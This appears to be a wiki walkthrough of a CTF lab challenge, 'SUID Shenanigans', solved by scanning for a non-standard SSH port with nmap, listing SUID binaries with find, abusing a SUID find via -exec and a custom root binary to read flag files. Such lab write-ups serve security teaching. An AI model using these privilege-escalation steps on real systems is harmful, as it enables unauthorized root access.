From aldeid
Jump to navigation Jump to search
You are here

[Day 8] SUID Shenanigans 08/12/2019


Elf Holly is suspicious of Elf-ministrator and wants to get onto the root account of a server he setup to see what files are on his account. The problem is, Holly is a low-privileged user.. can you escalate her privileges and hack your way into the root account?

Deploy and SSH into the machine. * Username: holly * Password: [email protected]*TU

SSH is not running on the standard port.. You might need to nmap scan the machine to find which port SSH is running on.

nmap <machine_ip> -p <start_port>-<end_port>

Read the supporting materials here.

#1 - What port is SSH running on?

SSH is running on port 65534.

$ sudo nmap -sS -sV -A -p-
[sudo] password for unknown: 
Starting Nmap 7.80 ( ) at 2020-05-02 08:10 CEST
Nmap scan report for
Host is up (0.046s latency).
Not shown: 65534 closed ports
65534/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 cc:59:b7:f7:3d:5e:11:92:24:91:03:cd:fa:7e:c7:e6 (RSA)
|   256 15:eb:e2:c6:9e:fb:18:a2:ce:b2:e6:96:87:f7:fa:f8 (ECDSA)
|_  256 f8:8b:d5:02:1b:2f:59:67:a9:f5:bc:a5:7b:ef:2b:50 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 554/tcp)
1   47.20 ms
2   45.90 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 183.66 seconds

#2 - Find and run a file as igor. Read the file /home/igor/flag1.txt

Let’s connect with ssh [email protected] -p 65534 and password [email protected]*TU.

Unfortunately, we have insufficient permissions to read /home/igor/flag1.txt. Let’s see start by listing files owned by igor with the SUID bit set.

[email protected]:~$ find / -user igor -perm -4000 -print 2>/dev/null

For older versions of nmap there was an interactive mode which allowed to execute commands. However, the version of nmap is recent, and the --interactive option is no longer available.

[email protected]:~$ nmap --interactive
nmap: unrecognized option '--interactive'
Nmap 7.01 ( )

Let’s try with find. This command is owned by igor:

$ ls -l /usr/bin/find
-rwsr-xr-x 1 igor igor 221768 Feb  7  2016 /usr/bin/find

find allows to read the flag.

$ find /home/igor/flag1.txt -exec cat {} \;

#3 - Find another binary file that has the SUID bit set. Using this file, can you become the root user and read the /root/flag2.txt file?

Now, we need to run a program as root. Let’s find files that are owned by root with SUID bit set:

$ find / -user root -perm -4000 -print 2>/dev/null

ping has the SUID bit set, which should not be the case. However, I haven’t been able to exploit it to access the flag.

Playing a bit with the list, I found out that system-control seems to be a custom binary (not found anywhere else on my Linux boxes). It simply executes commands as root:

[email protected]:~$ /usr/bin/system-control

===== System Control Binary =====

Enter system command: cat /root/flag2.txt


If you’ve finished the challenge and want more practise, checkout the Privilege Escalation Playground room created by SherlockSec: